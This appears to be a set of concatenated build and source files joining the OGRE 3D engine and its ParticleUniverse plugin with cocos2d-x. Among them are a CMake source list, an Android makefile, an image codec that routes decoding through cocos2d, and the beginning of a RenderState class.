src/ParticleEmitters/ParticleUniverseCircleEmitter.cpp
src/ParticleEmitters/ParticleUniverseCircleEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseLineEmitter.cpp
src/ParticleEmitters/ParticleUniverseLineEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseMeshSurfaceEmitter.cpp
src/ParticleEmitters/ParticleUniverseMeshSurfaceEmitterTokens.cpp
src/ParticleEmitters/ParticleUniversePointEmitter.cpp
src/ParticleEmitters/ParticleUniversePointEmitterTokens.cpp
src/ParticleEmitters/ParticleUniversePositionEmitter.cpp
src/ParticleEmitters/ParticleUniversePositionEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseSlaveEmitter.cpp
src/ParticleEmitters/ParticleUniverseSlaveEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseSphereSurfaceEmitter.cpp
src/ParticleEmitters/ParticleUniverseSphereSurfaceEmitterTokens.cpp
src/ParticleEmitters/ParticleUniverseVertexEmitter.cpp
src/ParticleEmitters/ParticleUniverseVertexEmitterTokens.cpp
# -- renderers --
src/ParticleRenderers/ParticleUniverseBeamRenderer.cpp
src/ParticleRenderers/ParticleUniverseBeamRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseBillboardRenderer.cpp
src/ParticleRenderers/ParticleUniverseBillboardRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseBox.cpp
src/ParticleRenderers/ParticleUniverseBoxRenderer.cpp
src/ParticleRenderers/ParticleUniverseBoxRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseBoxSet.cpp
src/ParticleRenderers/ParticleUniverseEntityRenderer.cpp
src/ParticleRenderers/ParticleUniverseEntityRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseLightRenderer.cpp
src/ParticleRenderers/ParticleUniverseLightRendererTokens.cpp
src/ParticleRenderers/ParticleUniversePrimitiveShapeSet.cpp
src/ParticleRenderers/ParticleUniverseRibbonTrailRenderer.cpp
src/ParticleRenderers/ParticleUniverseRibbonTrailRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseSphere.cpp
src/ParticleRenderers/ParticleUniverseSphereRenderer.cpp
src/ParticleRenderers/ParticleUniverseSphereRendererTokens.cpp
src/ParticleRenderers/ParticleUniverseSphereSet.cpp
# -- affectors --
src/ParticleAffectors/ParticleUniverseAlignAffector.cpp
src/ParticleAffectors/ParticleUniverseAlignAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseBaseCollider.cpp
src/ParticleAffectors/ParticleUniverseBaseColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseBaseForceAffector.cpp
src/ParticleAffectors/ParticleUniverseBaseForceAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseBoxCollider.cpp
src/ParticleAffectors/ParticleUniverseBoxColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffector.cpp
src/ParticleAffectors/ParticleUniverseCollisionAvoidanceAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseColourAffector.cpp
src/ParticleAffectors/ParticleUniverseColourAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseFlockCenteringAffector.cpp
src/ParticleAffectors/ParticleUniverseFlockCenteringAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseForceFieldAffector.cpp
src/ParticleAffectors/ParticleUniverseForceFieldAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseGeometryRotator.cpp
src/ParticleAffectors/ParticleUniverseGeometryRotatorTokens.cpp
src/ParticleAffectors/ParticleUniverseGravityAffector.cpp
src/ParticleAffectors/ParticleUniverseGravityAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseInterParticleCollider.cpp
src/ParticleAffectors/ParticleUniverseInterParticleColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseJetAffector.cpp
src/ParticleAffectors/ParticleUniverseJetAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseLineAffector.cpp
src/ParticleAffectors/ParticleUniverseLineAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseLinearForceAffector.cpp
src/ParticleAffectors/ParticleUniverseLinearForceAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseParticleFollower.cpp
src/ParticleAffectors/ParticleUniverseParticleFollowerTokens.cpp
src/ParticleAffectors/ParticleUniversePathFollower.cpp
src/ParticleAffectors/ParticleUniversePathFollowerTokens.cpp
src/ParticleAffectors/ParticleUniversePlaneCollider.cpp
src/ParticleAffectors/ParticleUniversePlaneColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseRandomiser.cpp
src/ParticleAffectors/ParticleUniverseRandomiserTokens.cpp
src/ParticleAffectors/ParticleUniverseScaleAffector.cpp
src/ParticleAffectors/ParticleUniverseScaleAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseScaleVelocityAffector.cpp
src/ParticleAffectors/ParticleUniverseScaleVelocityAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseSineForceAffector.cpp
src/ParticleAffectors/ParticleUniverseSineForceAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseSphereCollider.cpp
src/ParticleAffectors/ParticleUniverseSphereColliderTokens.cpp
src/ParticleAffectors/ParticleUniverseTextureAnimator.cpp
src/ParticleAffectors/ParticleUniverseTextureAnimatorTokens.cpp
src/ParticleAffectors/ParticleUniverseTextureRotator.cpp
src/ParticleAffectors/ParticleUniverseTextureRotatorTokens.cpp
src/ParticleAffectors/ParticleUniverseVelocityMatchingAffector.cpp
src/ParticleAffectors/ParticleUniverseVelocityMatchingAffectorTokens.cpp
src/ParticleAffectors/ParticleUniverseVortexAffector.cpp
src/ParticleAffectors/ParticleUniverseVortexAffectorTokens.cpp
# -- observers --
src/ParticleObservers/ParticleUniverseOnClearObserver.cpp
src/ParticleObservers/ParticleUniverseOnClearObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnCollisionObserver.cpp
src/ParticleObservers/ParticleUniverseOnCollisionObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnCountObserver.cpp
src/ParticleObservers/ParticleUniverseOnCountObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnEmissionObserver.cpp
src/ParticleObservers/ParticleUniverseOnEmissionObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnEventFlagObserver.cpp
src/ParticleObservers/ParticleUniverseOnEventFlagObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnExpireObserver.cpp
src/ParticleObservers/ParticleUniverseOnExpireObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnPositionObserver.cpp
src/ParticleObservers/ParticleUniverseOnPositionObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnQuotaObserver.cpp
src/ParticleObservers/ParticleUniverseOnQuotaObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnRandomObserver.cpp
src/ParticleObservers/ParticleUniverseOnRandomObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnTimeObserver.cpp
src/ParticleObservers/ParticleUniverseOnTimeObserverTokens.cpp
src/ParticleObservers/ParticleUniverseOnVelocityObserver.cpp
src/ParticleObservers/ParticleUniverseOnVelocityObserverTokens.cpp
# -- event handlers --
src/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoAffectorEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoEnableComponentEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoExpireEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoExpireEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoFreezeEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoPlacementParticleEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoScaleEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoScaleEventHandlerTokens.cpp
src/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandler.cpp
src/ParticleEventHandlers/ParticleUniverseDoStopSystemEventHandlerTokens.cpp
# -- externs --
src/Externs/ParticleUniverseBoxColliderExtern.cpp
src/Externs/ParticleUniverseBoxColliderExternTokens.cpp
src/Externs/ParticleUniverseGravityExtern.cpp
src/Externs/ParticleUniverseGravityExternTokens.cpp
src/Externs/ParticleUniversePhysXActorExtern.cpp
src/Externs/ParticleUniversePhysXActorExternTokens.cpp
src/Externs/ParticleUniversePhysXBridge.cpp
src/Externs/ParticleUniversePhysXFluidExtern.cpp
src/Externs/ParticleUniversePhysXFluidExternTokens.cpp
src/Externs/ParticleUniverseSceneDecoratorExtern.cpp
src/Externs/ParticleUniverseSceneDecoratorExternTokens.cpp
src/Externs/ParticleUniverseSphereColliderExtern.cpp
src/Externs/ParticleUniverseSphereColliderExternTokens.cpp
src/Externs/ParticleUniverseVortexExtern.cpp
src/Externs/ParticleUniverseVortexExternTokens.cpp
# -- behaviours --
src/ParticleBehaviours/ParticleUniverseSlaveBehaviour.cpp
src/ParticleBehaviours/ParticleUniverseSlaveBehaviourTokens.cpp
)
# Plugin headers, bridge-layer headers, and OgreMain headers.
include_directories("include")
include_directories("../include")
include_directories("../ogre_main/include")
# Build the plugin as a static library from the source list above.
add_library(ogre_particleuniverse STATIC
${SOURCE_FILES}
)
# Emit the archive next to the other libraries in the build tree.
set_target_properties(ogre_particleuniverse
PROPERTIES
ARCHIVE_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
LIBRARY_OUTPUT_DIRECTORY "${CMAKE_BINARY_DIR}/lib"
)
<file_sep>#ifndef OGRE_BRIDGE_IMAGE_CODEC_H
#define OGRE_BRIDGE_IMAGE_CODEC_H
#include "cocos2d.h"
#include <OgreCodec.h>
#include <OgreImageCodec.h>
namespace Ogre {
/// OGRE ImageCodec that delegates image decoding to cocos2d::Image.
/// Encoding is intentionally unsupported: code() returns an empty stream
/// and codeToFile() is a no-op.
class BridgeImageCodec : public ImageCodec
{
private:
// Codec type string reported to OGRE (e.g. the file extension handled).
String mType;
// cocos2d image format this codec instance decodes.
cocos2d::Image::Format mImageFitype;
public:
BridgeImageCodec(const String &type, const cocos2d::Image::Format &fiType) :
mType(type),
mImageFitype(fiType)
{}
virtual ~BridgeImageCodec(){}
/// @copydoc Codec::code
/// Encoding not supported — always returns a null DataStreamPtr.
DataStreamPtr code(MemoryDataStreamPtr& input, CodecDataPtr& pData) const{return DataStreamPtr();}
/// @copydoc Codec::codeToFile
/// Encoding not supported — no-op.
void codeToFile(MemoryDataStreamPtr& input, const String& outFileName, CodecDataPtr& pData) const{}
/// @copydoc Codec::decode
virtual Codec::DecodeResult decode(DataStreamPtr& input) const;
virtual String getType() const{ return mType; }
/// @copydoc Codec::magicNumberToFileExt
/// Magic-number detection not implemented — always returns "".
String magicNumberToFileExt(const char *magicNumberPtr, size_t maxbytes) const{return "";}
/// Static method to startup FreeImage and register the FreeImage codecs
static void startup(void);
/// Static method to shutdown FreeImage and unregister the FreeImage codecs
static void shutdown(void);
};
}
#endif // OGRE_BRIDGE_IMAGE_CODEC_H
<file_sep>LOCAL_PATH := $(call my-dir)
# Build OgreMain as a static library for Android (ndk-build).
include $(CLEAR_VARS)
LOCAL_MODULE := ogremain_static
LOCAL_MODULE_FILENAME := libogremain
# ogre_main
# Private include paths for OgreMain (re-used for LOCAL_C_INCLUDES below).
# Keep this a single continued assignment: a '#' line inside a backslash
# continuation would truncate the value.
LOCAL_OGRE_MAIN_INCLUDE := \
$(LOCAL_PATH)/include \
$(LOCAL_PATH)/include/Threading \
$(LOCAL_PATH)/include/Android \
$(LOCAL_PATH)/src/nedmalloc
# Full OgreMain source list compiled into libogremain.  Kept as one
# continued assignment; do not insert comment lines inside it — a '#'
# inside a backslash continuation would truncate the value.
LOCAL_OGRE_MAIN_SRC_FILES := \
src/OgreAlignedAllocator.cpp \
src/OgreAnimable.cpp \
src/OgreAnimation.cpp \
src/OgreAnimationState.cpp \
src/OgreAnimationTrack.cpp \
src/OgreArchiveManager.cpp \
src/OgreAutoParamDataSource.cpp \
src/OgreAxisAlignedBox.cpp \
src/OgreBillboard.cpp \
src/OgreBillboardChain.cpp \
src/OgreBillboardParticleRenderer.cpp \
src/OgreBillboardSet.cpp \
src/OgreBone.cpp \
src/OgreBorderPanelOverlayElement.cpp \
src/OgreCamera.cpp \
src/OgreCodec.cpp \
src/OgreColourValue.cpp \
src/OgreCommon.cpp \
src/OgreCompositionPass.cpp \
src/OgreCompositionTargetPass.cpp \
src/OgreCompositionTechnique.cpp \
src/OgreCompositor.cpp \
src/OgreCompositorChain.cpp \
src/OgreCompositorInstance.cpp \
src/OgreCompositorManager.cpp \
src/OgreConfigFile.cpp \
src/OgreControllerManager.cpp \
src/OgreConvexBody.cpp \
src/OgreDataStream.cpp \
src/OgreDefaultHardwareBufferManager.cpp \
src/OgreDefaultSceneQueries.cpp \
src/OgreDeflate.cpp \
src/OgreDepthBuffer.cpp \
src/OgreDistanceLodStrategy.cpp \
src/OgreDualQuaternion.cpp \
src/OgreDynLib.cpp \
src/OgreDynLibManager.cpp \
src/OgreEdgeListBuilder.cpp \
src/OgreEntity.cpp \
src/OgreException.cpp \
src/OgreExternalTextureSource.cpp \
src/OgreExternalTextureSourceManager.cpp \
src/OgreFileSystem.cpp \
src/OgreFont.cpp \
src/OgreFontManager.cpp \
src/OgreFrustum.cpp \
src/OgreGpuProgram.cpp \
src/OgreGpuProgramManager.cpp \
src/OgreGpuProgramParams.cpp \
src/OgreGpuProgramUsage.cpp \
src/OgreHardwareBufferManager.cpp \
src/OgreHardwareIndexBuffer.cpp \
src/OgreHardwareOcclusionQuery.cpp \
src/OgreHardwarePixelBuffer.cpp \
src/OgreHardwareVertexBuffer.cpp \
src/OgreHighLevelGpuProgram.cpp \
src/OgreHighLevelGpuProgramManager.cpp \
src/OgreImage.cpp \
src/OgreInstanceBatch.cpp \
src/OgreInstanceBatchHW.cpp \
src/OgreInstanceBatchHW_VTF.cpp \
src/OgreInstanceBatchShader.cpp \
src/OgreInstanceBatchVTF.cpp \
src/OgreInstancedGeometry.cpp \
src/OgreInstancedEntity.cpp \
src/OgreInstanceManager.cpp \
src/OgreKeyFrame.cpp \
src/OgreLight.cpp \
src/OgreLodStrategy.cpp \
src/OgreLodStrategyManager.cpp \
src/OgreLog.cpp \
src/OgreLogManager.cpp \
src/OgreManualObject.cpp \
src/OgreMaterial.cpp \
src/OgreMaterialManager.cpp \
src/OgreMaterialSerializer.cpp \
src/OgreMath.cpp \
src/OgreMatrix3.cpp \
src/OgreMatrix4.cpp \
src/OgreMemoryAllocatedObject.cpp \
src/OgreMemoryNedAlloc.cpp \
src/OgreMemoryNedPooling.cpp \
src/OgreMemoryTracker.cpp \
src/OgreMesh.cpp \
src/OgreMeshManager.cpp \
src/OgreMeshSerializer.cpp \
src/OgreMeshSerializerImpl.cpp \
src/OgreMovableObject.cpp \
src/OgreMovablePlane.cpp \
src/OgreNode.cpp \
src/OgreNumerics.cpp \
src/OgreOptimisedUtil.cpp \
src/OgreOptimisedUtilGeneral.cpp \
src/OgreOptimisedUtilSSE.cpp \
src/OgreOverlay.cpp \
src/OgreOverlayContainer.cpp \
src/OgreOverlayElement.cpp \
src/OgreOverlayElementCommands.cpp \
src/OgreOverlayElementFactory.cpp \
src/OgreOverlayManager.cpp \
src/OgrePanelOverlayElement.cpp \
src/OgreParticle.cpp \
src/OgreParticleEmitter.cpp \
src/OgreParticleEmitterCommands.cpp \
src/OgreParticleIterator.cpp \
src/OgreParticleSystem.cpp \
src/OgreParticleSystemManager.cpp \
src/OgrePass.cpp \
src/OgrePatchMesh.cpp \
src/OgrePatchSurface.cpp \
src/OgrePixelCountLodStrategy.cpp \
src/OgrePixelFormat.cpp \
src/OgrePlane.cpp \
src/OgrePlatformInformation.cpp \
src/OgrePolygon.cpp \
src/OgrePose.cpp \
src/OgrePrecompiledHeaders.cpp \
src/OgrePredefinedControllers.cpp \
src/OgrePrefabFactory.cpp \
src/OgreProfiler.cpp \
src/OgreProgressiveMesh.cpp \
src/OgreQuaternion.cpp \
src/OgreRectangle2D.cpp \
src/OgreRenderQueue.cpp \
src/OgreRenderQueueInvocation.cpp \
src/OgreRenderQueueSortingGrouping.cpp \
src/OgreRenderSystem.cpp \
src/OgreRenderSystemCapabilities.cpp \
src/OgreRenderSystemCapabilitiesManager.cpp \
src/OgreRenderSystemCapabilitiesSerializer.cpp \
src/OgreRenderTarget.cpp \
src/OgreRenderTexture.cpp \
src/OgreRenderToVertexBuffer.cpp \
src/OgreRenderWindow.cpp \
src/OgreResource.cpp \
src/OgreResourceBackgroundQueue.cpp \
src/OgreResourceGroupManager.cpp \
src/OgreResourceManager.cpp \
src/OgreRibbonTrail.cpp \
src/OgreRoot.cpp \
src/OgreRotationSpline.cpp \
src/OgreSceneManager.cpp \
src/OgreSceneManagerEnumerator.cpp \
src/OgreSceneNode.cpp \
src/OgreSceneQuery.cpp \
src/OgreScriptCompiler.cpp \
src/OgreScriptLexer.cpp \
src/OgreScriptParser.cpp \
src/OgreScriptTranslator.cpp \
src/OgreSerializer.cpp \
src/OgreShadowCameraSetup.cpp \
src/OgreShadowCameraSetupFocused.cpp \
src/OgreShadowCameraSetupLiSPSM.cpp \
src/OgreShadowCameraSetupPlaneOptimal.cpp \
src/OgreShadowCameraSetupPSSM.cpp \
src/OgreShadowCaster.cpp \
src/OgreShadowTextureManager.cpp \
src/OgreShadowVolumeExtrudeProgram.cpp \
src/OgreSimpleRenderable.cpp \
src/OgreSimpleSpline.cpp \
src/OgreSkeleton.cpp \
src/OgreSkeletonInstance.cpp \
src/OgreSkeletonManager.cpp \
src/OgreSkeletonSerializer.cpp \
src/OgreSmallVector.cpp \
src/OgreStaticGeometry.cpp \
src/OgreStreamSerialiser.cpp \
src/OgreString.cpp \
src/OgreStringConverter.cpp \
src/OgreStringInterface.cpp \
src/OgreSubEntity.cpp \
src/OgreSubMesh.cpp \
src/OgreTagPoint.cpp \
src/OgreTangentSpaceCalc.cpp \
src/OgreTechnique.cpp \
src/OgreTextAreaOverlayElement.cpp \
src/OgreTexture.cpp \
src/OgreTextureManager.cpp \
src/OgreTextureUnitState.cpp \
src/OgreUnifiedHighLevelGpuProgram.cpp \
src/OgreUserObjectBindings.cpp \
src/OgreUTFString.cpp \
src/OgreVector2.cpp \
src/OgreVector3.cpp \
src/OgreVector4.cpp \
src/OgreVertexIndexData.cpp \
src/OgreViewport.cpp \
src/OgreWindowEventUtilities.cpp \
src/OgreWireBoundingBox.cpp \
src/OgreWorkQueue.cpp \
src/OgreFreeImageCodec.cpp \
src/OgreDDSCodec.cpp \
src/OgreZip.cpp \
src/Threading/OgreDefaultWorkQueueStandard.cpp \
src/common/OgreConfigDialog.cpp \
src/common/OgreErrorDialog.cpp \
src/common/OgreTimer.cpp
# Headers exported to modules that link against this library.
# BUGFIX: the freetype include line used to end with a trailing backslash,
# which folded the next "LOCAL_EXPORT_C_INCLUDES +=" line into this
# assignment and corrupted both values.
LOCAL_EXPORT_C_INCLUDES := \
$(LOCAL_PATH)/../../../cocos \
$(LOCAL_PATH)/../../../cocos/platform/android \
$(LOCAL_PATH)/../../../external/freetype2/include/android
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/include
LOCAL_EXPORT_C_INCLUDES += $(LOCAL_PATH)/../include
# Include paths used while compiling this module itself.
LOCAL_C_INCLUDES := $(LOCAL_PATH)/../include
LOCAL_C_INCLUDES += $(LOCAL_OGRE_MAIN_INCLUDE)
# BUGFIX: "LOCAL_SRC_FILES := \" ended with a line continuation that
# swallowed the following "+=" line, leaving LOCAL_SRC_FILES holding the
# literal text "LOCAL_SRC_FILES += ..." instead of the source list.
LOCAL_SRC_FILES := $(LOCAL_OGRE_MAIN_SRC_FILES)
LOCAL_WHOLE_STATIC_LIBRARIES := cocos2dx_static
include $(BUILD_STATIC_LIBRARY)
$(call import-module,platform/android)<file_sep>#include "OgreBridgeImageCodec.h"
#include <OgreCodec.h>
#include <renderer/CCTexture2D.h>
namespace Ogre {
// Adapter that exposes cocos2d::Image's decoders to Ogre's codec layer.
// An instance is constructed for one fixed cocos2d image format and
// converts a decoded cocos2d image into Ogre ImageData / memory streams.
class BridgeImageStream : public cocos2d::Image
{
private:
    // The cocos2d image format this stream instance decodes (fixed at construction).
    Format mImageType;
public:
    BridgeImageStream(const Format &fiType) :
        mImageType(fiType)
    {}
    virtual ~BridgeImageStream(){}
    // Reads the whole Ogre stream into memory and decodes it with the
    // cocos2d loader matching mImageType. Returns false for unsupported
    // formats or decode failures.
    bool decode(DataStreamPtr& input)
    {
        // Copies the entire input stream into a contiguous buffer
        // (second argument presumably requests auto-free — TODO confirm
        // against MemoryDataStream's constructor docs).
        MemoryDataStream memStream(input, true);
        ssize_t size = memStream.size();
        const unsigned char *data = memStream.getPtr();
        bool ret = false;
        switch (mImageType)
        {
        case Format::PNG:
            ret = initWithPngData(data, size);
            break;
        case Format::JPG:
            ret = initWithJpgData(data, size);
            break;
        case Format::TIFF:
            ret = initWithTiffData(data, size);
            break;
        case Format::WEBP:
            ret = initWithWebpData(data, size);
            break;
        case Format::PVR:
            ret = initWithPVRData(data, size);
            break;
        case Format::ETC:
            ret = initWithETCData(data, size);
            break;
        case Format::S3TC:
            ret = initWithS3TCData(data, size);
            break;
        case Format::ATITC:
            ret = initWithATITCData(data, size);
            break;
        default:
        // Unhandled formats (e.g. TGA) fall through and report failure.
        {
            /* // load and detect image format
            tImageTGA* tgaData = tgaLoadBuffer(data, size);
            if (tgaData != nullptr && tgaData->status == TGA_OK)
            {
                ret = initWithTGAData(tgaData);
            }
            else
            {
                CCAssert(false, "unsupport image format!");
            }
            free(tgaData);
            break;*/
        }
        }
        return ret;
    }
    // Fills the Ogre ImageData header (format, dimensions, size) from the
    // decoded cocos2d image. Returns false when the cocos2d pixel format
    // has no PF_* mapping here.
    bool useImageData(ImageCodec::ImageData* imgData)
    {
        bool ret = true;
        switch (getRenderFormat())
        {
        // NOTE(review): the BGRA8888/RGBA8888 -> PF_A8B8G8R8/PF_A8R8G8B8
        // pairing depends on byte-order conventions of both libraries —
        // verify visually with a textured asset.
        //! 32-bit texture: BGRA8888
        case cocos2d::Texture2D::PixelFormat::BGRA8888:
            imgData->format = PF_A8B8G8R8;
            break;
        //! 32-bit texture: RGBA8888
        case cocos2d::Texture2D::PixelFormat::RGBA8888:
            imgData->format = PF_A8R8G8B8;
            break;
        //! 24-bit texture: RGBA888
        case cocos2d::Texture2D::PixelFormat::RGB888:
            imgData->format = PF_R8G8B8;
            break;
        //! 16-bit texture without Alpha channel
        case cocos2d::Texture2D::PixelFormat::RGB565:
            imgData->format = PF_R5G6B5;
            break;
        //! 8-bit textures used as masks
        case cocos2d::Texture2D::PixelFormat::A8:
            imgData->format = PF_A8;
            break;
        //! 8-bit intensity texture
        case cocos2d::Texture2D::PixelFormat::I8:
            imgData->format = PF_L8;
            break;
        //! 16-bit textures used as masks
        case cocos2d::Texture2D::PixelFormat::AI88:
            imgData->format = PF_BYTE_LA;
            break;
        //! 16-bit textures: RGBA4444
        case cocos2d::Texture2D::PixelFormat::RGBA4444:
            imgData->format = PF_A4R4G4B4;
            break;
        //! 16-bit textures: RGB5A1
        case cocos2d::Texture2D::PixelFormat::RGB5A1:
            imgData->format = PF_A1R5G5B5;
            break;
        //! 4-bit PVRTC-compressed texture: PVRTC4
        case cocos2d::Texture2D::PixelFormat::PVRTC4:
            imgData->format = PF_PVRTC_RGB4;
            break;
        //! 4-bit PVRTC-compressed texture: PVRTC4 (has alpha channel)
        case cocos2d::Texture2D::PixelFormat::PVRTC4A:
            imgData->format = PF_PVRTC_RGBA4;
            break;
        //! 2-bit PVRTC-compressed texture: PVRTC2
        case cocos2d::Texture2D::PixelFormat::PVRTC2:
            imgData->format = PF_PVRTC_RGB2;
            break;
        //! 2-bit PVRTC-compressed texture: PVRTC2 (has alpha channel)
        case cocos2d::Texture2D::PixelFormat::PVRTC2A:
            imgData->format = PF_PVRTC_RGBA2;
            break;
        // The compressed formats below have no PF_* mapping here, so
        // decoding them makes the whole codec report failure.
        //! ETC-compressed texture: ETC
        case cocos2d::Texture2D::PixelFormat::ETC:
        //! S3TC-compressed texture: S3TC_Dxt1
        case cocos2d::Texture2D::PixelFormat::S3TC_DXT1:
        //! S3TC-compressed texture: S3TC_Dxt3
        case cocos2d::Texture2D::PixelFormat::S3TC_DXT3:
        //! S3TC-compressed texture: S3TC_Dxt5
        case cocos2d::Texture2D::PixelFormat::S3TC_DXT5:
        //! ATITC-compressed texture: ATC_RGB
        case cocos2d::Texture2D::PixelFormat::ATC_RGB:
        //! ATITC-compressed texture: ATC_EXPLICIT_ALPHA
        case cocos2d::Texture2D::PixelFormat::ATC_EXPLICIT_ALPHA:
        //! ATITC-compresed texture: ATC_INTERPOLATED_ALPHA
        case cocos2d::Texture2D::PixelFormat::ATC_INTERPOLATED_ALPHA:
        //! Default texture format: AUTO
        default: // Texture2D::PixelFormat::DEFAULT = AUTO:
            imgData->format = PF_UNKNOWN;
            ret = false;
            break;
        };
        if (ret)
        {
            imgData->depth = 1; // only 2D formats handled by this codec
            imgData->width = getWidth();
            imgData->height = getHeight();
            imgData->num_mipmaps = 0; // no mipmaps in non-DDS
            imgData->flags = 0;
            imgData->size = getDataLen();
        }
        return ret;
    }
    // Copies the decoded pixel data into a freshly allocated Ogre memory
    // stream bound to 'output'. Returns false when there is no pixel data.
    bool useStreamImagePtr(MemoryDataStreamPtr &output)
    {
        bool ret = true;
        if (this->getDataLen() > 0)
        {
            output.bind(OGRE_NEW MemoryDataStream(this->getDataLen()));
            uchar* pDst = output->getPtr();
            uchar* pSrc = this->getData();
            memcpy(pDst, pSrc, this->getDataLen());
        }
        else
            ret = false;
        return ret;
    }
};
static std::vector<ImageCodec * > s_sCodecList;
/// @copydoc Codec::decode
/// Decodes 'input' through cocos2d's image loaders and returns the pixel
/// data plus an ImageData header. On any failure an empty DecodeResult is
/// returned (same as before), but the intermediate ImageData no longer leaks.
Codec::DecodeResult BridgeImageCodec::decode(DataStreamPtr& input) const
{
    BridgeImageStream imageStream(mImageFitype);
    // Step 1: decode the raw bytes with the format-specific loader.
    bool ret = imageStream.decode(input);
    // Step 2: build the Ogre image header from the decoded image.
    ImageData* imgData = NULL;
    if (ret)
    {
        imgData = OGRE_NEW ImageData();
        ret = imageStream.useImageData(imgData);
    }
    // Step 3: copy the pixel data into an Ogre memory stream.
    MemoryDataStreamPtr output;
    if (ret)
    {
        ret = imageStream.useStreamImagePtr(output);
    }
    DecodeResult result;
    if (ret)
    {
        result.first = output;
        result.second = CodecDataPtr(imgData);
    }
    else if (imgData)
    {
        // FIX: previously imgData was allocated with OGRE_NEW and then
        // abandoned when step 2 or 3 failed — free it on the error path.
        OGRE_DELETE imgData;
    }
    return result;
}
/// Static method to startup FreeImage and register the FreeImage codecs
void BridgeImageCodec::startup(void)
{
static const int supports_num = 8;
static const String supports[] = { "png", "jpg", "tiff", "webp", "pvr", "etc", "s3tc", "atitc" };
static const cocos2d::Image::Format supports_type[] = { cocos2d::Image::Format::PNG, cocos2d::Image::Format::JPG, cocos2d::Image::Format::TIFF, cocos2d::Image::Format::WEBP, cocos2d::Image::Format::PVR, cocos2d::Image::Format::ETC, cocos2d::Image::Format::S3TC, cocos2d::Image::Format::ATITC };
BridgeImageCodec* codec = NULL;
for (int i = 0; i < supports_num; i++)
{
codec = OGRE_NEW BridgeImageCodec(supports[i], supports_type[i]);
s_sCodecList.push_back(codec);
Codec::registerCodec(codec);
}
}
/// Static method to shutdown FreeImage and unregister the FreeImage codecs
void BridgeImageCodec::shutdown(void)
{
std::vector<ImageCodec*>::iterator itor, end;
end = s_sCodecList.end();
itor = s_sCodecList.begin();
for (; itor != end; itor++)
{
Codec::unRegisterCodec(*itor);
OGRE_DELETE *itor;
}
s_sCodecList.clear();
}
};
<file_sep>#include "OgreNodeProtocol.h"
#include <Ogre.h>
// FIX: use forward slashes in include paths — backslashes are not path
// separators on non-Windows compilers, and this file is built for Android
// (see the NDK makefile that lists OgreNodeProtocol.cpp).
#include "components/OgreBridgeBufferManager.h"
#include "components/OgreBridgeTextureManager.h"
#include "OgreOgreManager.h"
USING_NS_CC;
namespace Ogre
{
// Default constructor: gives every scalar member a deterministic value so
// a freshly constructed RenderState never hands uninitialized data to the
// renderer or to the copy constructors (which copy all of these fields).
RenderState::RenderState()
{
    _visible = false;
    glProgramState = NULL;
    mat4 = cocos2d::Mat4::IDENTITY;
    // FIX: these were previously left uninitialized.
    isTransparent = false;
    isDepthTestEnabled = false;
    isDepthWriteEnabled = false;
    textureId = 0;
    vertexBufferId = 0;
    indexBufferId = 0;
    indexCount = 0;
    // NOTE(review): indexBufferType, operationType, blend and meshCommand
    // keep their header defaults (their types are not visible here) —
    // confirm they are safely initialized in the class declaration.
}
// Non-const copy overload (kept because the header declares it); delegates
// to the const copy constructor so both overloads always copy the same
// member set and cannot drift apart.
RenderState::RenderState(RenderState& state) :
    RenderState(static_cast<const RenderState&>(state))
{
}
// Copy constructor: duplicates every piece of cached render state so the
// copy can be used independently of its source.
RenderState::RenderState(const RenderState& state)
{
    // Visibility and depth/transparency flags.
    _visible            = state._visible;
    isTransparent       = state.isTransparent;
    isDepthTestEnabled  = state.isDepthTestEnabled;
    isDepthWriteEnabled = state.isDepthWriteEnabled;
    // GL resource handles and draw-call parameters.
    textureId       = state.textureId;
    vertexBufferId  = state.vertexBufferId;
    indexBufferId   = state.indexBufferId;
    indexBufferType = state.indexBufferType;
